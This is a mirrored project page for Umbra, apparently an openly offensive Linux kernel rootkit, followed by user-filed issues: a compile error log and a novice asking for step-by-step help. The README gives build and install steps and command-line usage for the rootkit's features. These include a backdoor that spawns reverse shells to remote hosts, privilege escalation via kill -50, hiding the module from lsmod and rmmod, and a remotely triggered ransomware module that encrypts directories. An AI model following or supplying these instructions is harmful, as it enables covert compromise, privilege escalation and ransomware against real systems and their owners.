Code Monkey home page Code Monkey logo

umbra's Introduction

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra is an experimental remotely controllable LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that can spawn reverse shells to remote hosts, launch malware remotely and much more.

The rootkit is still under development, although the features listed below are already fully operational.

Backdoor in action

Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.

Features

  • 🌟 Backdoor which spawns reverse shell to remote IP after receiving a malicious TCP packet.
  • 🌟 Use the Umbra Injector to control the rootkit remotely:
    • Remote reverse shell.
    • Hide/unhide rootkit remotely.
    • Launch Umbra Modules.

  • NEW: Added the Umbra Modules, special malware-like modules which enhance Umbra and can be launched remotely by the Umbra Injector.
  • NEW: Umbra module "Ransom" which turns Umbra into a remotely controllable ransomware.

Ransom module in action

  • Umbra hides all its files and directories from user commands such as ls.
  • Umbra can hide/unhide itself remotely and locally via signals.
  • Privilege escalation by sending signal 50.
  • Spawn netcat reverse shell on module load.
  • Spawn netcat reverse shell to a remote host by sending signal 51.

More functionalities will come in later updates.

Disclaimer

This rookit is purely for educational purposes. I am not responsible for any damage resulting from its unintended use.

Also bear in mind that Umbra only incorporates light hiding and protection mechanisms. It is not intended to be used on a real scenario.

IMPORTANT: If you are going to test this rootkit in your own machine, I strongly recommend to use a VM.

About the Umbra Modules: The ransom module uses a trivial encryption mechanism but it can and will certainly encrypt any folder in your machine. Although files can be easily decrypted, I definitely do not recommend running this towards your root folder or similar unless on a controlled environment.

Table of Contents

  1. Build and Install
  2. Unloading Umbra
  3. Local Control
  4. Umbra Injector: Remote Control
  5. Umbra Modules
  6. References

Build and install

Remember that you should have a 4.x or 5.x kernel available.

  1. Download your kernel header files
apt install linux-headers-$(uname -r)
  1. Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check .vscode/c_cpp_properties.json for an example on which directories to include.

  2. Clone the project

git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Build Umbra
make
  1. Load Umbra in the kernel and configure environment The script will install Umbra in the kernel and configure a special directory where to store the malware modules. The directory will be later hidden by the rootkit.
sudo ./install.sh

If you have previously run the script and wish to just install Umbra in the kernel, you can run:

sudo insmod ./umbra.ko

Unloading Umbra

Make sure Umbra is not in invisible mode, otherwise this will fail.

sudo rmmod umbra

Basic Usage: Local control

Change current user privileges to root

  • Send signal 50 to any PID.
kill -50 1

Start reverse netcat shell to IP:PORT

  • Set your desired IP and port in CONFIG.H before building the rootkit. By default 127.0.0.1:5888

  • Start listening at the remote host.

nc -lvp 5888
  • Send signal 51 to any PID. Umbra will catch it and start the shell.
kill -51 1

Note: Umbra also tries to start the reverse shell on load.

Hide the rootkit - Invisible mode

This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.

kill -52 1

Unhide the rootkit

This reverts the invisible mode if active.

kill -53 1

Umbra Injector: Remote control

Get reverse shell via backdoor

The Umbra Injector can be run either before Umbra is installed (thus getting the shell once it is on), or after Umbra is installed on the target system.

./injector -S 127.0.0.1

The backdoor listens for packets with the following payload: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

You can also build your own injector using my library RawTCP.

Hide the rootkit remotely - Invisible mode

This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.

./injector -i 127.0.0.1

Unhide the rootkit remotely

This reverts the invisible mode if active.

./injector -u 127.0.0.1

Help

You can see the full information on how to run the Umbra Injector by:

./injector -h

Umbra Modules

The Umbra Modules will be stored by the install.sh script on /tmp/umbra, where Umbra will hide them. The directory will not visible by commands such as ls or similar.

Ransom module

This module can launch remote ransomware-like attacks via the Umbra Injector. Encrypted files appear with the .ubr extension.

Currently the encryption mechanism is a simple bit-level NOP, as a proof of concept. You may edit the module to include your own encryption algorithm.

Encrypt a directory and all its sub-directories

./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

Decrypt a directory and all its sub-directories

./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

References

The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used: How to create LKMs:

Linux syscall reference:

Some rootkit references:

License

This project is licensed under the GPLv2 license. See LICENSE

umbra's People

Contributors

h3xduck avatar jserv avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar

umbra's Issues

Makefile not found.

Running make does nothing. "make: *** No targets specified and no makefile found. Stop."

Unable to do make as it throws the errors

github_runner@Ubuntu:~/Desktop/Rootkit/Umbra/kernel$ make
make -C /lib/modules/5.15.0-56-generic/build M=/home/github_runner/Desktop/Rootkit/Umbra/kernel modules
make[1]: Entering directory '/usr/src/linux-headers-5.15.0-56-generic'
CC [M] /home/github_runner/Desktop/Rootkit/Umbra/kernel/src/ftrace_manager.o
/home/github_runner/Desktop/Rootkit/Umbra/kernel/src/ftrace_manager.c: In function ‘install_hook’:
/home/github_runner/Desktop/Rootkit/Umbra/kernel/src/ftrace_manager.c:38:20: error: assignment to ‘ftrace_func_t’ {aka ‘void (*)(long unsigned int, long unsigned int, struct ftrace_ops *, struct ftrace_regs )’} from incompatible pointer type ‘void ()(long unsigned int, long unsigned int, struct ftrace_ops *, struct pt_regs *)’ [-Werror=incompatible-pointer-types]
38 | hook->ops.func = ftrace_thunk;
| ^
/home/github_runner/Desktop/Rootkit/Umbra/kernel/src/ftrace_manager.c:39:48: error: ‘FTRACE_OPS_FL_RECURSION_SAFE’ undeclared (first use in this function); did you mean ‘FTRACE_OPS_FL_RECURSION’?
39 | hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS| FTRACE_OPS_FL_RECURSION_SAFE| FTRACE_OPS_FL_IPMODIFY;
| ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
| FTRACE_OPS_FL_RECURSION
/home/github_runner/Desktop/Rootkit/Umbra/kernel/src/ftrace_manager.c:39:48: note: each undeclared identifier is reported only once for each function it appears in
cc1: some warnings being treated as errors
make[2]: *** [scripts/Makefile.build:297: /home/github_runner/Desktop/Rootkit/Umbra/kernel/src/ftrace_manager.o] Error 1
make[1]: *** [Makefile:1903: /home/github_runner/Desktop/Rootkit/Umbra/kernel] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-5.15.0-56-generic'
make: *** [Makefile:7: all] Error 2

Could you suggest the fix?

Issues

I have issues downloading the tool, Im new and I would like to learn how to use. ¿Is there any possibility i can contact someone so I can do it step by step? call me scriptkiddy

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.